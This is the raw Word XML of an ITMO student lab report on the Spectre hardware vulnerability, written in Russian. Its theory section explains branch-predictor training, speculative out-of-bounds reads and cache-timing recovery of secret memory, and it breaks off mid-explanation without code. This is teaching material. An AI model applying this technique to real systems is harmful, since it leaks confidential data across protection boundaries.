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8F9B" w14:textId="77777777" w:rsidR="003E627B" w:rsidRPr="00CE4912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САНКТ-ПЕТЕРБУРГСКИЙ НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ ИТМО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7305226B" w14:textId="77777777" w:rsidR="003E627B" w:rsidRPr="00CE4912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циплина: Архитектура ЭВМ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27065F67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3A86C810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FB5D8E4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4E7CD1" w14:textId="77777777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3D8A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A081EC" w14:textId="77777777" w:rsidR="003E627B" w:rsidRPr="00CE4912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4AA4E358" w14:textId="24B32692" w:rsidR="003E627B" w:rsidRPr="000F0BA5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шней работе №</w:t>
      </w:r>
      <w:r w:rsidR="000F0B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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="32B2920B" w14:textId="1C11E61A" w:rsidR="003E627B" w:rsidRPr="00CE4912" w:rsidRDefault="003E627B" w:rsidP="000342D7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4912">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00FA5778">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spectre</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4912">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07997921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C8A541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788648" w14:textId="77777777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43F90" w14:textId="77777777" w:rsidR="003E627B" w:rsidRPr="00CE4912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0AC75520" w14:textId="73E20018" w:rsidR="003E627B" w:rsidRPr="00CE4912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Панюхин Никита Константинович</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C196FFD" w14:textId="61D7D056" w:rsidR="003E627B" w:rsidRPr="00CE4912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СУ: 334964</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969E41C" w14:textId="06613475" w:rsidR="003E627B" w:rsidRPr="00CE4912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. гр. M</w:t>
      </w:r>
      <w:r w:rsidR="00285085"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8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60D718" w14:textId="51011C9B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33655" w14:textId="2038346C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FC909" w14:textId="551021C7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261" w14:textId="23EA0371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D7B9" w14:textId="136AAD99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294CE" w14:textId="586394F3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20B0" w14:textId="727AC7E2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21272" w14:textId="77777777" w:rsidR="00CC2B8E" w:rsidRPr="00CE4912" w:rsidRDefault="00CC2B8E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BEB7" w14:textId="5BB9566F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D1D4A" w14:textId="050D304E" w:rsidR="003E627B" w:rsidRPr="00CE4912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CB0B" w14:textId="77777777" w:rsidR="00260E14" w:rsidRPr="00CE4912" w:rsidRDefault="00260E14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89427" w14:textId="3510650B" w:rsidR="003E627B" w:rsidRPr="00CE4912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A5D745E" w14:textId="1B1BF089" w:rsidR="001163EF" w:rsidRPr="005169CB" w:rsidRDefault="003E627B" w:rsidP="009757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169CB" w:rsidRPr="0051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3C3A9E5" w14:textId="2599D151" w:rsidR="000342D7" w:rsidRPr="00CE4912" w:rsidRDefault="000342D7" w:rsidP="008708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Pr="005B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809" w:rsidRPr="005B5809">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>знакомство с аппаратной уязвимостью Spectre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24597E33" w14:textId="0BB24576" w:rsidR="000342D7" w:rsidRPr="00CE4912" w:rsidRDefault="000342D7" w:rsidP="008708BB">
      <w:pPr>
        <w:pStyle w:val="a3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CE4912">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Инструментарий и требования к работе: </w:t>
      </w:r>
      <w:r w:rsidR="008F10FC">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r w:rsidR="008708BB" w:rsidRPr="00CE4912">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80E147" w14:textId="77777777" w:rsidR="006A236D" w:rsidRPr="00CE4912" w:rsidRDefault="006A236D" w:rsidP="00596AB6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="280" w:beforeAutospacing="0" w:after="280" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74871CB2" w14:textId="2E0D5418" w:rsidR="006276BD" w:rsidRPr="00CE4912" w:rsidRDefault="00275886" w:rsidP="009651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4912">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB667B" w14:textId="7474AA72" w:rsidR="000D2CCD" w:rsidRDefault="00912EAA" w:rsidP="008F71F9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7E1D13" w:rsidRPr="004F02A3">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="002060"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Spectre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007E1D13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – аппаратная уязвимость процессоров</w:t>
      </w:r>
      <w:r w:rsidR="00F63C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Механизм её работы основан на спекулятивном выполнении. В данном случае</w:t>
      </w:r>
      <w:r w:rsidR="005734C0" w:rsidRPr="0057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C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рассматривается предсказание условного перехода (например, структура </w:t>
      </w:r>
      <w:r w:rsidR="00F63C16" w:rsidRPr="00F813FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="00F63C16" w:rsidRPr="00F813FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F63C16" w:rsidRPr="00F813FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidR="00394FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005734C0" w:rsidRPr="005734C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2A2382" w14:textId="7922A1D4" w:rsidR="00BA2550" w:rsidRDefault="00DC199F" w:rsidP="00BA2550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кольку современные процессоры выполняют множество операций </w:t>
      </w:r>
      <w:r w:rsidR="00A948BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>параллельно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, существует и активно используется оптимизация условных переходов</w:t>
      </w:r>
      <w:r w:rsidR="00A16DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Существует множество различных техник, </w:t>
      </w:r>
      <w:r w:rsidR="00A16DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00A16DCA" w:rsidRPr="00A16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DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>использует</w:t>
      </w:r>
      <w:r w:rsidR="00A16DCA" w:rsidRPr="00A16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DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">самую простую из них – </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A16DCA" w:rsidRPr="004F02A3">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="002060"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>branch</w:t>
        </w:r>
        <w:r w:rsidR="00A16DCA" w:rsidRPr="004F02A3">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="002060"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00A16DCA" w:rsidRPr="004F02A3">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:bCs/>
            <w:color w:val="002060"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>prediction</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A16DCA" w:rsidRPr="004F02A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A16DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> то есть предсказание результата условного перехода без дополнительного вычисления</w:t>
      </w:r>
      <w:r w:rsidR="00D0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B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">какого-либо </w:t>
      </w:r>
      <w:r w:rsidR="00605629">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">пользовательского </w:t>
      </w:r>
      <w:r w:rsidR="00855B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кода</w:t>
      </w:r>
      <w:r w:rsidR="00D070B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA2550">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Самый простой блок предсказания лишь запоминает количество переходов в ту или иную ветку, чтобы при новом вызове запустить выполнение самого частного направления заранее.</w:t>
      </w:r>
      <w:r w:rsidR="00501687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В современных процессорах это, конечно, более сложная схема (например, она сможет распознать чередующиеся вызовы и т.п.), но даже простой нам будет достаточно. Главное в этой схеме (для уязвимости), что положительная ветка условного перехода может при некоторых условиях выполнится даже при отрицательном условии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73290E37" w14:textId="31B50184" w:rsidR="00C041AC" w:rsidRDefault="00C041AC" w:rsidP="00BA2550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создать такие условия</w:t>
      </w:r>
      <w:r w:rsidRPr="00C041A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ой бы сложный не был предсказатель, если мы подадим ему на вход очень много положительных результатов, он предскажет положительный результат после этого. Таким образом посылая много запросов </w:t>
      </w:r>
      <w:r w:rsidR="002A647C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с положительным отве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рассчитываем, что следующий вызов будет предсказан как положительный, даже если он таким не является.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BB8C6" w14:textId="63F36065" w:rsidR="00891EB1" w:rsidRPr="008A2CE2" w:rsidRDefault="00125CBB" w:rsidP="00BA2550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 это полезно (для уязвимости)</w:t>
      </w:r>
      <w:r w:rsidRPr="00125CB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FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвимость </w:t>
      </w:r>
      <w:r w:rsidR="00566FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00566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FE2" w:rsidRPr="00566FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00566FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>специализируется</w:t>
      </w:r>
      <w:r w:rsidR="00566FE2" w:rsidRPr="00566FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00566FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на чтении данных памяти, потенциально конфиденциальных, без прямого доступа к ним.</w:t>
      </w:r>
      <w:r w:rsidR="008A2CE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Чтобы этого добиться с помощью указанного выше предсказания условного перехода можно с</w:t>
      </w:r>
      <w:r w:rsidR="008B72BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="008A2CE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="005E4CD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidR="008A2CE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ать следующее</w:t>
      </w:r>
      <w:r w:rsidR="008A2CE2" w:rsidRPr="008A2CE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E0F702" w14:textId="5295C02D" w:rsidR="005734C0" w:rsidRDefault="00B90A6D" w:rsidP="008F71F9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вим в условный переход обращение к памяти. Пусть желаемый объект хранится по адресу </w:t>
      </w:r>
      <w:r w:rsidRPr="00B27DD3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гда чтобы получить его нам необходимо, чтобы выполнился аналог, когда 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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(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 w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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Однако такой код пользователь не позволит запустить, но позволит</w:t>
      </w:r>
      <w:r w:rsidR="009E762F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> запустить</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90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get</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(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my</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_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value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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my</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs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когда не принимает значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00361057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 w:rsidR="00593165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8B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деальном случае, но из-за ошибки предсказания он может принять значение </w:t>
      </w:r>
      <w:r w:rsidRPr="005A733D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нам и нужно. Таким образом </w:t>
      </w:r>
      <w:r w:rsidR="002C499F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">мы посылаем множество положительных запросов к условному оператору, добиваемся следующего положительного предсказания и посылаем значение </w:t>
      </w:r>
      <w:r w:rsidR="002C499F" w:rsidRPr="002C499F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 w:rsidR="002C499F" w:rsidRPr="00821607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, при этом </w:t>
      </w:r>
      <w:r w:rsidR="002C499F" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="002C499F" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00471530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 w:rsidR="002C499F" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002C499F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется раньше, чем проверка значения </w:t>
      </w:r>
      <w:r w:rsidR="002C499F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="002C49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9F5582" w14:textId="44C6FD36" w:rsidR="005B5CC0" w:rsidRPr="00A97FDE" w:rsidRDefault="005B5CC0" w:rsidP="008F71F9">
      <w:pPr>
        <w:spacing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всё не так просто – как только закончится вычисление результата условного перехода</w:t>
      </w:r>
      <w:r w:rsidR="002409FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, процессор поймёт, что совершил ошибку и попытается вернуть всё в первоначальное </w:t>
      </w:r>
      <w:r w:rsidR="00C56D93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9A7630">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Все значения переменных вернуть</w:t>
      </w:r>
      <w:r w:rsidR="00857136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся</w:t>
      </w:r>
      <w:r w:rsidR="009A7630">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, однако </w:t>
      </w:r>
      <w:r w:rsidR="00857136">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">за счёт того, что в процессорах есть кэш, </w:t>
      </w:r>
      <w:r w:rsidR="00471530">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">мы всё ещё сможем понять, какой был ответ </w:t>
      </w:r>
      <w:r w:rsidR="0084209E" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="0084209E" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0084209E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="0084209E" w:rsidRPr="00B90A6D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0084209E" w:rsidRPr="0084209E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по времени отклика обращения к ячейкам памяти</w:t>
      </w:r>
      <w:r w:rsidR="00D512B1" w:rsidRPr="00D512B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12B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>попадание в кэш или нет)</w:t>
      </w:r>
      <w:r w:rsidR="0084209E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
